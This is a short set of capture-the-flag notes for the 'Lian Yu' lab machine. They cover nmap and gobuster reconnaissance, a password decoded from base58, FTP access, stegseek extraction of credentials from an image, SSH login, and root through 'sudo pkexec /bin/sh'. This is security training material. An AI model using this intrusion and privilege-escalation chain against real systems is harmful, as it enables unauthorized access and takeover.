lian yu

port scanning: nmap -sC -sV 10.10.142.10 -v
	PORT    STATE SERVICE VERSION
	21/tcp  open  ftp     vsftpd 3.0.2
	22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
	| ssh-hostkey: 
	|   1024 5650bd11efd4ac5632c3ee733ede87f4 (DSA)
	|   2048 396f3a9cb62dad0cd86dbe77130725d6 (RSA)
	|   256 a66996d76d6127967ebb9f83601b5212 (ECDSA)
	|_  256 3f437675a85aa6cd33b066420491fea0 (ED25519)
	80/tcp  open  http    Apache httpd
	| http-methods: 
	|_  Supported Methods: GET HEAD POST OPTIONS
	|_http-title: Purgatory
	|_http-server-header: Apache
	111/tcp open  rpcbind 2-4 (RPC #100000)
	| rpcinfo: 
	|   program version    port/proto  service
	|   100000  2,3,4        111/tcp   rpcbind
	|   100000  2,3,4        111/udp   rpcbind
	|   100000  3,4          111/tcp6  rpcbind
	|   100000  3,4          111/udp6  rpcbind
	|   100024  1          33497/tcp6  status
	|   100024  1          35928/udp   status
	|   100024  1          45224/udp6  status
	|_  100024  1          59428/tcp   status
	Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

gobuster: gobuster dir -u http://10.10.198.210:80/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt , /island -> /island/2100/ -> /island/2100/ -> /island/2100/green_arrow.ticket -> base58 hash (found password)

/island -> vigilante found username
ftp -> with username and password
get aa.jpg file
use stegseek for the aa.jpg -> file aa.jpg.out -> found two files -> password.txt and (shadon) -> has password
ssh machineIp with slade and password found user flag
sudo -l -> root -> pkexec 

    sudo pkexec /bin/sh

 Got root flag